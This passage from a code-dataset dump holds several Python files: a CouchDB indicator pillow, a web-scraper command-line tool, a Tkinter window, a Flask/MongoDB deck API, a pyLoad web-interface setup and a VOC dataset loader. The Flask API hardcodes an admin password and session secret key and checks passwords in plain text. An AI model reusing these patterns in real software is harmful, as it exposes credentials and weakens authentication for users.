pillow(cls):\n doc_type = cls.document_class._doc_type\n domains = ' '.join(cls.domains)\n return type(FluffPillow)(cls.__name__ + 'Pillow', (FluffPillow,), {\n 'couch_filter': 'fluff/domain_type',\n 'extra_args': {\n 'domains': domains,\n 'doc_type': doc_type\n },\n 'document_class': cls.document_class,\n 'indicator_class': cls,\n })\n\n @classmethod\n def get_result(cls, calc_name, key, reduce=True):\n calculator = cls._calculators[calc_name]\n result = {}\n for emitter_name in calculator._fluff_emitters:\n shared_key = [cls._doc_type] + key + [calc_name, emitter_name]\n emitter_type = getattr(calculator, emitter_name)._fluff_emitter\n q_args = {\n 'reduce': reduce,\n 'include_docs': not reduce,\n }\n if emitter_type == 'date':\n now = datetime.datetime.utcnow().date()\n start = now - calculator.window\n end = now\n q = cls.view(\n 'fluff/generic',\n startkey=shared_key + [json_format_date(start)],\n endkey=shared_key + [json_format_date(end)],\n **q_args\n ).all()\n elif emitter_type == 'null':\n q = cls.view(\n 'fluff/generic',\n key=shared_key + [None],\n **q_args\n ).all()\n if reduce:\n try:\n result[emitter_name] = q[0]['value']\n except IndexError:\n result[emitter_name] = 0\n else:\n result[emitter_name] = q\n return result\n\n class Meta:\n app_label = 'fluff'\n\n\nclass FluffPillow(BasicPillow):\n indicator_class = IndicatorDocument\n\n def change_transform(self, doc_dict):\n doc = self.document_class.wrap(doc_dict)\n indicator_id = '%s-%s' % (self.indicator_class.__name__, doc.get_id)\n\n try:\n indicator = self.indicator_class.get(indicator_id)\n except ResourceNotFound:\n indicator = self.indicator_class(_id=indicator_id)\n indicator.calculate(doc)\n return indicator\n\n def change_transport(self, indicator):\n 
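# Persist the indicator document built or updated in change_transform above.\n 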
indicator.save()\n","sub_path":"fluff/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86258343","text":"from cmd import Cmd\n\nfrom webscraper.model.graphcreator import GraphCreator\nfrom webscraper.model.webdata import WebData\nfrom webscraper.model.webobject import DataHandler\nfrom webscraper.model.webobject import WebObjectFactory\nfrom webscraper.model.webrequest import *\nfrom webscraper.view.consoleview import *\n\n\nclass Command(Cmd):\n\n def __init__(self):\n Cmd.__init__(self)\n self.view = ConsoleView()\n self.web_request = WebRequest()\n self.web_object_factory = WebObjectFactory()\n self.data_handler = DataHandler()\n self.web_data = WebData(self.web_request, self.web_object_factory,\n self.data_handler)\n self.graph_creator = GraphCreator(self.web_data)\n\n def do_request(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- request --\n -- Use the request command to handle fetching of website data\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n u -- sets primary url for fetch request\n example: request u--'url_here'\n f -- fetches data from primary url\n example: request f\n up -- sets url padding (if required)\n example: request up--'url_padding'\n ur -- add recursive url (usually done from data)\n example: request ur--'url'\n rf -- fetches data from all recursive urls\n example: request rf\n p -- prints data related to requests\n example: request p--'p_option'\n\n -- p OPTIONS --\n url -- prints primary url\n example: request p--url\n urlpadd -- prints recursive url padding\n example: request p--urlpadd\n recurls -- prints recursive urls\n example: request p--recurls\n reqdata -- prints primary request data\n example: request p--reqdata\n recdata -- prints recursive request data\n example: request p--recdata\n recdatacount -- prints recursive data count\n example: request p--recdatacount\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.web_request.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def do_data(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- data --\n -- Use the data command to filter and manipulate website data\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n l -- load saved web objects\n example: data l--'file_name'\n s -- save filtered web objects\n example: data s--'file_name'\n g -- get request data by tag, class/id, name\n example: data g--'tag':'class/id':'name'\n gr -- get recursive request data by tag, class/id, name\n example: data gr--'tag':'class/id':'name'\n cf -- clear all currently filtered data\n example: data cf\n fu -- filter urls from request data adding\n example: data fu--'tag':'class/id':'name'\n them to recursive urls\n dk -- set keywords to filter filtered data\n example: data dk--'tag':'class/id':'name'\n rdk -- set keywords to filter recursive filtered data\n example: data rdk--'tag':'class/id':'name'\n cd -- consolidate all filtered data\n example: data cd--'cd_option':'cd_option'\n\n -- cd OPTIONS --\n kw -- filters data by keywords\n example: data cd--kw:0:0|kw:0:0\n child -- filters data by children\n example: data cd--kw:0:0|child:0:0\n\n wo -- display all created web objects\n example: data wo\n p -- 
prints data related to filtered data\n example: data p--'p_option'\n\n -- p OPTIONS --\n fdata -- prints filtered data\n example: data p--fdata\n rdata -- prints filtered recursive data\n example: data p--rdata\n fdkeywords -- prints filtered data keywords\n example: data p--fdkeywords\n rfdkeywords -- prints recursive filtered data keywords\n example: data p--rfdkeywords\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.web_data.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def do_graph(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- graph --\n -- Use the graph command to display filtered data in a graphical format\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n g -- displays graph -- takes one parameter 'graph_title'\n example: graph g--'graph_title_here'\n d -- sets graph data -- takes one parameter\n example: graph d--'attribute_name_here'\n gd -- displays currently set graph data -- takes no parameters\n example: graph gd\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.graph_creator.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def split_args(self, args):\n if args is None:\n return None\n else:\n return args.split()\n","sub_path":"webscraper/cli/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"563530544","text":"from Tkinter import *\nfrom os import name, sep\n\nclass PencereGoster(Tk):\n def __init__(self, baslik, icerik):\n Tk.__init__(self)\n #self.geometry(\"300x50\")\n self.geometry(\"300x100\")\n self.baslik = baslik\n\n self.resizable(0, 0)\n if name == \"nt\":\n self.iconbitmap(\"kaynaklar\"+sep+\"camii.ico\")\n elif name == \"posix\":\n self.iconbitmap(\"@kaynaklar\"+sep+\"camii.xbm\")\n \n self.title(baslik)\n etk = Label(self, text=icerik)\n etk.pack(expand=True)\n dug = Button(self, text=\"Tamam\", command=lambda:self.destroy())\n dug.pack(side=\"bottom\", expand=True)\n self.ortala(self)\n \n \n def ortala(self, penc):\n penc.update_idletasks()\n gen= penc.winfo_width()\n yuk = penc.winfo_height()\n \n e_gen = penc.winfo_screenwidth()\n e_yuk = penc.winfo_screenheight()\n \n x = (e_gen / 2) - (gen / 2)\n y = (e_yuk / 2) - (yuk / 2)\n \n penc.geometry(\"{}x{}+{}+{}\".format(gen, yuk, x, y))\n\ndef baslat():\n pencere = PencereGoster(\"Pencere\",\"Deneme Penceresi\")\n mainloop()\n\nif __name__ == \"__main__\":\n baslat()\n ","sub_path":"kaynak/PencereGoster.py","file_name":"PencereGoster.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"60632656","text":"from flask import Flask, request, session, g, redirect, url_for, abort, make_response, current_app, \\\n render_template, flash\nfrom pymongo import MongoClient\nfrom bson import BSON\nfrom bson import json_util\nfrom bson.objectid import ObjectId\nimport logging, sys\nfrom datetime import timedelta\nfrom functools import update_wrapper\nimport datetime\nlogging.basicConfig(stream=sys.stderr)\napp = Flask(__name__)\n\ndef crossdomain(origin=None, methods=None, headers=None,\n max_age=21600, attach_to_all=True,\n automatic_options=True):\n if methods is not None:\n methods = ', '.join(sorted(x.upper() 
for x in methods))\n if headers is not None and not isinstance(headers, basestring):\n headers = ', '.join(x.upper() for x in headers)\n if not isinstance(origin, basestring):\n origin = ', '.join(origin)\n if isinstance(max_age, timedelta):\n max_age = max_age.total_seconds()\n\n def get_methods():\n if methods is not None:\n return methods\n\n options_resp = current_app.make_default_options_response()\n return options_resp.headers['allow']\n\n def decorator(f):\n def wrapped_function(*args, **kwargs):\n if automatic_options and request.method == 'OPTIONS':\n resp = current_app.make_default_options_response()\n else:\n resp = make_response(f(*args, **kwargs))\n if not attach_to_all and request.method != 'OPTIONS':\n return resp\n\n h = resp.headers\n\n h['Access-Control-Allow-Origin'] = origin\n h['Access-Control-Allow-Credentials'] = 'true'\n h['Access-Control-Allow-Methods'] = get_methods()\n h['Access-Control-Max-Age'] = str(max_age)\n h['Access-Control-Allow-Headers'] = '*, X-Requested-With, x-requested-with, Content-Type, If-Modified-Since, If-None-Match'\n # if headers is not None:\n # h['Access-Control-Allow-Headers'] = headers\n return resp\n\n f.provide_automatic_options = False\n return update_wrapper(wrapped_function, f)\n return decorator\n\n\n@app.route(\"/\")\n@crossdomain(origin='http://localhost')\ndef hello():\n\tsession['test'] = True\n\treturn \"hi\"\n\n\n@app.route('/admin/login', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef adminLogin():\n # return json_util.dumps({'test': True})\n data = request.get_json()\n email = data['email']\n password = data['password']\n\n ret = { 'success' : False }\n\n if email == 'lakk' and password == 'lakin925':\n session[\"admin\"] = True\n ret['success'] = True\n\n return json_util.dumps(ret)\n\n\n@app.route('/deck/', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef deck(deck_id):\n # session[\"mod_id\"]\n # return json_util.dumps(session)\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n deck = db.decks.find_one({\"_id\" : ObjectId(deck_id)})\n del deck['mod']\n deck['_id'] = str(deck['_id'])\n # ret = { 'loggedIn' : ('mod_email' in session) }\n return json_util.dumps({\"success\" : True, \"deck\": deck })\n\n@app.route('/mods/decks', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modDecks():\n # session[\"mod_id\"]\n # return json_util.dumps(session)\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n decks = db.decks.find({\"mod\" : ObjectId(session[\"mod_id\"])})\n deckInfo = map(lambda d: {\"_id\" : str(d[\"_id\"]), \"player\" : d[\"player\"], \"class\" : d[\"class\"], \"date\" : d['date']}, decks)\n\n # ret = { 'loggedIn' : ('mod_email' in session) }\n return json_util.dumps({\"success\" : True, \"decks\": deckInfo })\n\n@app.route('/mods/status', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modStatus():\n\t# ret = { 'loggedIn' : ('mod_email' in session) }\n\treturn json_util.dumps(session)\n\n@app.route('/mods/login', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modLogin():\n\t# return json_util.dumps({'test': True})\n data = request.get_json()\n email = data['email']\n password = data['password']\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n deck_coll = db.mods\n obj = deck_coll.find_one({\"email\": email, \"pass\": password})\n ret = { 'success' : False }\n\n if not (obj is None):\n session[\"mod_id\"] = str(obj[\"_id\"])\n ret['success'] = True\n\n 
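# On success the session now carries mod_id, which the other /mods/* handlers\n # check before touching the decks collection.\n 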
return json_util.dumps(ret)\n\n@app.route('/mods/deck//publish', methods=['GET','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef publishDeck(deck_id):\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n\n ret = { 'success' : False }\n #check if mod is allowed to publish\n if(db.decks.find({\"_id\" : ObjectId(deck_id), \"mod\" : ObjectId(session[\"mod_id\"])}).count() == 1):\n db.decks.update({\"_id\" : ObjectId(deck_id)}, {\"$set\" : {\"published\" : True}})\n ret['success'] = True\n return json_util.dumps(ret)\n\n@app.route('/mods/deck/create', methods=['POST','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef createDeck():\n if 'mod_id' not in session:\n return json_util.dumps({'success' : False})\n data = request.get_json()\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n data['mod'] = ObjectId(session['mod_id'])\n data['published'] = False\n data['finished'] = False\n data['created'] = datetime.datetime.utcnow()\n data['edited'] = datetime.datetime.utcnow()\n db.decks.insert(data)\n return json_util.dumps({'success' : True})\n\n@app.route('/mods/deck//save', methods=['POST','OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef updateDeck(deck_id):\n if 'mod_id' not in session:\n return json_util.dumps({'success' : False})\n\n data = request.get_json()\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n #check for a valid mod and deck_id\n if(db.decks.find({\"_id\" : ObjectId(deck_id), \"mod\" : ObjectId(session[\"mod_id\"])}).count() != 1):\n return json_util.dumps({'success' : False})\n\n db = client.hearthgg\n data['mod'] = ObjectId(session['mod_id'])\n data['published'] = False\n data['finished'] = False\n data['edited'] = datetime.datetime.utcnow()\n db.decks.update({\"_id\" : ObjectId(deck_id)}, {'$set' : data})\n return json_util.dumps({'success' : True})\n\n\n\n\nif __name__ == \"__main__\":\n\tapp.secret_key = 'PPsccS200djlKK@832a'\n\tapp.run()\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"28659258","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n This program is free software; you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation; either version 3 of the License,\r\n or (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n See the GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program; if not, see .\r\n\r\n @author: RaNaN\r\n\"\"\"\r\n\r\nimport sys\r\nimport module.common.pylgettext as gettext\r\n\r\nimport os\r\nfrom os.path import join, abspath, dirname, exists\r\nfrom os import makedirs\r\n\r\nPROJECT_DIR = abspath(dirname(__file__))\r\nPYLOAD_DIR = abspath(join(PROJECT_DIR, \"..\", \"..\"))\r\n\r\nsys.path.append(PYLOAD_DIR)\r\n\r\nfrom module import InitHomeDir\r\nfrom module.utils import format_size\r\n\r\nimport bottle\r\nfrom bottle import run, app\r\n\r\nfrom jinja2 import Environment, FileSystemLoader, PrefixLoader, FileSystemBytecodeCache\r\nfrom middlewares import StripPathMiddleware, GZipMiddleWare, PrefixMiddleware\r\n\r\nSETUP = None\r\nPYLOAD = None\r\n\r\nfrom module.web import 
ServerThread\r\n\r\nif not ServerThread.core:\r\n if ServerThread.setup:\r\n SETUP = ServerThread.setup\r\n config = SETUP.config\r\n else:\r\n raise Exception(\"Could not access pyLoad Core\")\r\nelse:\r\n PYLOAD = ServerThread.core.api\r\n config = ServerThread.core.config\r\n\r\nfrom module.common.JsEngine import JsEngine\r\n\r\nJS = JsEngine()\r\n\r\nTEMPLATE = config.get('webinterface', 'template')\r\nDL_ROOT = config.get('general', 'download_folder')\r\nLOG_ROOT = config.get('log', 'log_folder')\r\nPREFIX = config.get('webinterface', 'prefix')\r\n\r\nif PREFIX:\r\n PREFIX = PREFIX.rstrip(\"/\")\r\n if PREFIX and not PREFIX.startswith(\"/\"):\r\n PREFIX = \"/\" + PREFIX\r\n\r\nDEBUG = config.get(\"general\", \"debug_mode\") or \"-d\" in sys.argv or \"--debug\" in sys.argv\r\nbottle.debug(DEBUG)\r\n\r\ncache = join(\"tmp\", \"jinja_cache\")\r\nif not exists(cache):\r\n makedirs(cache)\r\n\r\nbcc = FileSystemBytecodeCache(cache, '%s.cache')\r\nloader = PrefixLoader({\r\n \"default\": FileSystemLoader(join(PROJECT_DIR, \"templates\", \"default\")),\r\n \"mobile\": FileSystemLoader(join(PROJECT_DIR, \"templates\", \"mobile\")),\r\n 'js': FileSystemLoader(join(PROJECT_DIR, 'media', 'js'))\r\n})\r\n\r\nenv = Environment(loader=loader, extensions=['jinja2.ext.i18n', 'jinja2.ext.autoescape'], trim_blocks=True, auto_reload=True,\r\n bytecode_cache=bcc)\r\n\r\n# Filter\r\n\r\nenv.filters[\"type\"] = lambda x: str(type(x))\r\nenv.filters[\"formatsize\"] = format_size\r\nenv.filters[\"getitem\"] = lambda x, y: x.__getitem__(y)\r\nif not PREFIX:\r\n env.filters[\"url\"] = lambda x: x\r\nelse:\r\n env.filters[\"url\"] = lambda x: PREFIX + x if x.startswith(\"/\") else x\r\n\r\n# Locale\r\n\r\ngettext.setpaths([join(os.sep, \"usr\", \"share\", \"pyload\", \"locale\"), None])\r\ntranslation = gettext.translation(\"django\", join(PYLOAD_DIR, \"locale\"),\r\n languages=[config.get(\"general\", \"language\"), \"en\"],fallback=True)\r\ntranslation.install(True)\r\nenv.install_gettext_translations(translation)\r\n\r\n# Middlewares\r\n\r\nfrom beaker.middleware import SessionMiddleware\r\n\r\nsession_opts = {\r\n 'session.type': 'file',\r\n 'session.cookie_expires': False,\r\n 'session.data_dir': './tmp',\r\n 'session.auto': False\r\n}\r\n\r\nweb = StripPathMiddleware(SessionMiddleware(app(), session_opts))\r\nweb = GZipMiddleWare(web)\r\n\r\nif PREFIX:\r\n web = PrefixMiddleware(web, prefix=PREFIX)\r\n\r\nimport pyload_app\r\nimport setup_app\r\nimport cnl_app\r\nimport api_app\r\n\r\n# Server Adapter\r\ndef run_server(host, port, server):\r\n run(app=web, host=host, port=port, quiet=True, server=server)\r\n\r\nif __name__ == \"__main__\":\r\n run(app=web, port=8001)\r\n","sub_path":"cgi-bin/module/web/webinterface.py","file_name":"webinterface.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195285180","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# --------------------------------------------------------\n# @Author : panjq\n# @E-mail : pan_jinquan@163.com\n# @Date : 2020-02-05 11:01:49\n# --------------------------------------------------------\n\"\"\"\nimport os\nimport xmltodict\nimport numpy as np\nimport cv2\nimport glob\nimport random\nimport numbers\nfrom tqdm import tqdm\n\n\nclass Dataset(object):\n \"\"\"\n from torch.utils.data import DataLoader, ConcatDataset\n \"\"\"\n\n def __init__(self, **kwargs):\n self.image_id = []\n\n def __getitem__(self, index):\n raise NotImplementedError\n\n def 
__add__(self, other):\n return ConcatDataset([self, other])\n\n def __len__(self):\n raise NotImplementedError\n\n @staticmethod\n def read_files(filename, *args):\n \"\"\"\n :param filename:\n :return:\n \"\"\"\n image_id = []\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n line = line.rstrip().split(\" \")[0]\n image_id.append(line.rstrip())\n return image_id\n\n\nclass VOCDataset(Dataset):\n\n def __init__(self,\n filename=None,\n data_root=None,\n anno_dir=None,\n image_dir=None,\n class_names=None,\n transform=None,\n target_transform=None,\n color_space=\"RGB\",\n keep_difficult=False,\n shuffle=False,\n check=False):\n \"\"\"\n :param filename:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :param transform:\n :param target_transform:\n :param color_space:\n :param keep_difficult:\n :param shuffle:\n \"\"\"\n super(VOCDataset, self).__init__()\n self.class_names, self.class_dict = self.parser_classes(class_names)\n parser = self.parser_paths(filename, data_root, anno_dir, image_dir)\n self.data_root, self.anno_dir, self.image_dir, self.image_id = parser\n self.postfix = self.get_image_postfix(self.image_dir, self.image_id)\n self.transform = transform\n self.target_transform = target_transform\n self.color_space = color_space\n self.keep_difficult = keep_difficult\n if check:\n self.image_id = self.checking(self.image_id)\n if shuffle:\n random.seed(200)\n random.shuffle(self.image_id)\n self.num_images = len(self.image_id)\n self.classes = list(self.class_dict.values())\n self.num_classes = max(list(self.class_dict.values())) + 1 if self.class_dict else None\n print(\"class_dict:{}\".format(self.class_dict))\n print(\"image id:{}\".format(len(self.image_id)))\n\n def get_image_postfix(self, image_dir, image_id):\n \"\"\"\n Get the image file extension.\n :param image_dir:\n :return:\n \"\"\"\n if \".\" in image_id[0]:\n postfix = \"\"\n else:\n image_list = glob.glob(os.path.join(image_dir, \"*\"))\n postfix = os.path.basename(image_list[0]).split(\".\")[1]\n return postfix\n\n def __get_image_anno_file(self, image_dir, anno_dir, image_id: str, img_postfix):\n \"\"\"\n :param image_dir:\n :param anno_dir:\n :param image_id:\n :param img_postfix:\n :return:\n \"\"\"\n if not img_postfix and \".\" in image_id:\n image_id, img_postfix = image_id.split(\".\")\n image_file = os.path.join(image_dir, \"{}.{}\".format(image_id, img_postfix))\n annotation_file = os.path.join(anno_dir, \"{}.xml\".format(image_id))\n return image_file, annotation_file\n\n def checking(self, image_ids: list, ignore_empty=True):\n \"\"\"\n :param image_ids:\n :param ignore_empty: whether to drop samples whose annotations are empty\n :return:\n \"\"\"\n dst_ids = []\n # image_ids = image_ids[:100]\n # image_ids = image_ids[100:]\n for image_id in tqdm(image_ids):\n image_file, annotation_file = self.get_image_anno_file(image_id)\n if not os.path.exists(annotation_file):\n continue\n if not os.path.exists(image_file):\n continue\n bboxes, labels, is_difficult = self.get_annotation(annotation_file)\n if not self.keep_difficult:\n bboxes = bboxes[is_difficult == 0]\n # labels = labels[is_difficult == 0]\n if ignore_empty and (len(bboxes) == 0 or len(labels) == 0):\n print(\"empty annotation:{}\".format(annotation_file))\n continue\n dst_ids.append(image_id)\n print(\"total images:{}, legal images:{}\".format(len(image_ids), len(dst_ids)))\n return dst_ids\n\n def parser_classes(self, class_names):\n \"\"\"\n class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n :param class_names:\n str : class file\n list: 
[\"face\",\"person\"]\n dict: custom label ids can be assigned, e.g. {'BACKGROUND': 0, 'person': 1, 'person_up': 1, 'person_down': 1}\n :return:\n \"\"\"\n if isinstance(class_names, str):\n class_names = super().read_files(class_names)\n if isinstance(class_names, list):\n class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n elif isinstance(class_names, dict):\n class_dict = class_names\n else:\n class_dict = None\n return class_names, class_dict\n\n def parser_paths(self, filenames=None, data_root=None, anno_dir=None, image_dir=None):\n \"\"\"\n :param filenames:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :return:\n \"\"\"\n if isinstance(data_root, str):\n anno_dir = os.path.join(data_root, \"Annotations\") if not anno_dir else anno_dir\n image_dir = os.path.join(data_root, \"JPEGImages\") if not image_dir else image_dir\n if isinstance(filenames, str):\n data_root = os.path.dirname(filenames)\n image_id = self.read_files(filenames, anno_dir)\n if not anno_dir:\n anno_dir = os.path.join(data_root, \"Annotations\")\n if not image_dir:\n image_dir = os.path.join(data_root, \"JPEGImages\")\n return data_root, anno_dir, image_dir, image_id\n\n def crop_image(self, image, bbox):\n \"\"\"\n :param image:\n :param bbox:\n :return:\n \"\"\"\n from utils import image_processing # local import, as in show_boxes_image below\n # bboxes = image_processing.extend_bboxes([bbox], scale=[1.5, 1.5])\n # bboxes = image_processing.extend_bboxes([bbox], scale=[1.2, 1.2])\n bboxes = image_processing.extend_bboxes([bbox], scale=[1.3, 1.3])\n images = image_processing.get_bboxes_crop_padding(image, bboxes)\n return images, bboxes\n\n def convert_target(self, boxes, labels):\n annotations = []\n for i in range(len(boxes)):\n bbox = boxes[i, :].tolist()\n label = labels[i].tolist()\n anno = list()\n anno += bbox\n anno += [label]\n assert len(anno) == 5\n annotations.append(anno)\n target = np.array(annotations)\n return target\n\n def __getitem__(self, index):\n \"\"\"\n :param index: int or str\n :return: rgb_image\n \"\"\"\n image_id = self.index2id(index)\n image_file, annotation_file = self.get_image_anno_file(image_id)\n # print(image_file)\n bboxes, labels, is_difficult = self.get_annotation(annotation_file)\n image = self.read_image(image_file, color_space=self.color_space)\n if not self.keep_difficult:\n index = is_difficult == 0\n bboxes = bboxes[index]\n labels = labels[index]\n # landms = landms[index]\n if self.transform:\n image, bboxes, labels = self.transform(image, bboxes, labels)\n num_boxes = len(bboxes)\n if self.target_transform:\n bboxes, labels = self.target_transform(bboxes, labels) # torch.Size([29952, 4]),torch.Size([29952])\n\n target = self.convert_target(bboxes, labels)\n if num_boxes == 0:\n index = int(random.uniform(0, len(self)))\n return self.__getitem__(index)\n # return image, bboxes, labels\n return image, target\n\n def get_image_anno_file(self, index):\n \"\"\"\n :param index:\n :return:\n \"\"\"\n image_id = self.index2id(index)\n image_file, annotation_file = self.__get_image_anno_file(self.image_dir, self.anno_dir, image_id, self.postfix)\n return image_file, annotation_file\n\n def index2id(self, index):\n \"\"\"\n :param index: int or str\n :return:\n \"\"\"\n if isinstance(index, numbers.Number):\n image_id = self.image_id[index]\n else:\n image_id = index\n return image_id\n\n def __len__(self):\n return len(self.image_id)\n\n def check_bbox(self, width, height, bbox):\n xmin, ymin, xmax, ymax = bbox\n sw = (xmax - xmin) / width\n sh = (ymax - ymin) / height\n ok = True\n if sw < 0 or sw > 1:\n ok = False\n elif sh < 0 or sh > 1:\n ok 
= False\n return ok\n\n def get_annotation(self, xml_file):\n \"\"\"\n :param xml_file:\n :param class_dict: class_dict = {class_name: i for i, class_name in enumerate(class_names)}\n :return:\n \"\"\"\n try:\n content = self.read_xml2json(xml_file)\n annotation = content[\"annotation\"]\n # get image shape\n width = int(annotation[\"size\"][\"width\"])\n height = int(annotation[\"size\"][\"height\"])\n depth = int(annotation[\"size\"][\"depth\"])\n filename = annotation[\"filename\"]\n objects = annotation[\"object\"]\n except Exception as e:\n print(\"illegal annotation:{}, {}\".format(xml_file, e))\n objects = []\n objects_list = []\n if not isinstance(objects, list):\n objects = [objects]\n for object in objects:\n name = str(object[\"name\"]).lower()\n if self.class_names and name not in self.class_names:\n continue\n difficult = int(object[\"difficult\"])\n xmin = float(object[\"bndbox\"][\"xmin\"])\n xmax = float(object[\"bndbox\"][\"xmax\"])\n ymin = float(object[\"bndbox\"][\"ymin\"])\n ymax = float(object[\"bndbox\"][\"ymax\"])\n # rect = [xmin, ymin, xmax - xmin, ymax - ymin]\n bbox = [xmin, ymin, xmax, ymax]\n if not self.check_bbox(width, height, bbox):\n # print(\"illegal bbox:{}\".format(xml_file))\n continue\n item = {}\n item[\"bbox\"] = bbox\n item[\"difficult\"] = difficult\n if self.class_dict:\n name = self.class_dict[name]\n item[\"name\"] = name\n objects_list.append(item)\n bboxes, labels, is_difficult = self.get_objects_items(objects_list)\n return bboxes, labels, is_difficult\n\n def get_objects_items(self, objects_list):\n \"\"\"\n :param objects_list:\n :return:\n \"\"\"\n bboxes = []\n labels = []\n is_difficult = []\n for item in objects_list:\n bboxes.append(item[\"bbox\"])\n labels.append(item['name'])\n is_difficult.append(item['difficult'])\n bboxes = np.array(bboxes, dtype=np.float32)\n labels = np.array(labels) # for string\n # labels = np.array(labels, dtype=np.int64) # for int64\n # labels = np.asarray(labels).reshape(-1, 1)\n is_difficult = np.array(is_difficult, dtype=np.uint8)\n return bboxes, labels, is_difficult\n\n @staticmethod\n def read_files(filename, *args):\n \"\"\"\n :param filename:\n :return:\n \"\"\"\n if not filename: # if None\n assert args\n from utils import file_processing # local import, as elsewhere in this file\n anno_list = []\n for a in args:\n anno_list += file_processing.get_files(a, postfix=[\"*.xml\"])\n image_id = VOCDataset.get_files_id(anno_list)\n elif isinstance(filename, list):\n image_id = filename\n elif isinstance(filename, str):\n # image_id = super().read_files(filename)\n image_id = Dataset.read_files(filename)\n else:\n image_id = None\n raise Exception(\"Error:{}\".format(filename))\n return image_id\n\n @staticmethod\n def get_files_id(file_list):\n \"\"\"\n :param file_list:\n :return:\n \"\"\"\n image_idx = []\n for path in file_list:\n basename = os.path.basename(path)\n id = basename.split(\".\")[0]\n image_idx.append(id)\n return image_idx\n\n @staticmethod\n def read_xml2json(xml_file):\n \"\"\"\n import xmltodict\n :param xml_file:\n :return:\n \"\"\"\n with open(xml_file, encoding='utf-8') as fd: # load the XML file into a dict\n content = xmltodict.parse(fd.read())\n return content\n\n def read_image(self, image_file, color_space=\"RGB\"):\n \"\"\"\n :param image_file:\n :param color_space:\n :return:\n \"\"\"\n image = cv2.imread(str(image_file))\n if color_space.lower() == \"rgb\":\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\nclass ConcatDataset(Dataset):\n \"\"\" Concat Dataset \"\"\"\n\n def __init__(self, datasets, shuffle=False):\n \"\"\"\n import torch.utils.data 
as torch_utils\n voc1 = PolygonParser(filename1)\n voc2 = PolygonParser(filename2)\n voc=torch_utils.ConcatDataset([voc1, voc2])\n ====================================\n :param datasets:\n :param shuffle:\n \"\"\"\n super(ConcatDataset, self).__init__()\n assert len(datasets) > 0, 'dataset should not be an empty iterable'\n # super(ConcatDataset, self).__init__()\n if not isinstance(datasets, list):\n datasets = [datasets]\n self.image_id = []\n self.dataset = datasets\n self.shuffle = shuffle\n for dataset_id, dataset in enumerate(self.dataset):\n image_id = dataset.image_id\n image_id = self.add_dataset_id(image_id, dataset_id)\n self.image_id += image_id\n self.classes = dataset.classes\n if shuffle:\n random.seed(200)\n random.shuffle(self.image_id)\n\n def add_dataset_id(self, image_id, dataset_id):\n \"\"\"\n :param image_id:\n :param dataset_id:\n :return:\n \"\"\"\n out_image_id = []\n for id in image_id:\n out_image_id.append({\"dataset_id\": dataset_id, \"image_id\": id})\n return out_image_id\n\n def __getitem__(self, index):\n \"\"\"\n :param index: int\n :return:\n \"\"\"\n dataset_id = self.image_id[index][\"dataset_id\"]\n image_id = self.image_id[index][\"image_id\"]\n dataset = self.dataset[dataset_id]\n # print(dataset.data_root, image_id)\n data = dataset.__getitem__(image_id)\n return data\n\n def get_image_anno_file(self, index):\n dataset_id = index[\"dataset_id\"]\n image_id = index[\"image_id\"]\n return self.dataset[dataset_id].get_image_anno_file(image_id)\n\n def get_annotation(self, xml_file):\n return self.dataset[0].get_annotation(xml_file)\n\n def __len__(self):\n return len(self.image_id)\n\n\ndef VOCDatasets(filenames=None,\n data_root=None,\n anno_dir=None,\n image_dir=None,\n class_names=None,\n transform=None,\n color_space=\"RGB\",\n keep_difficult=False,\n shuffle=False,\n check=False):\n \"\"\"\n 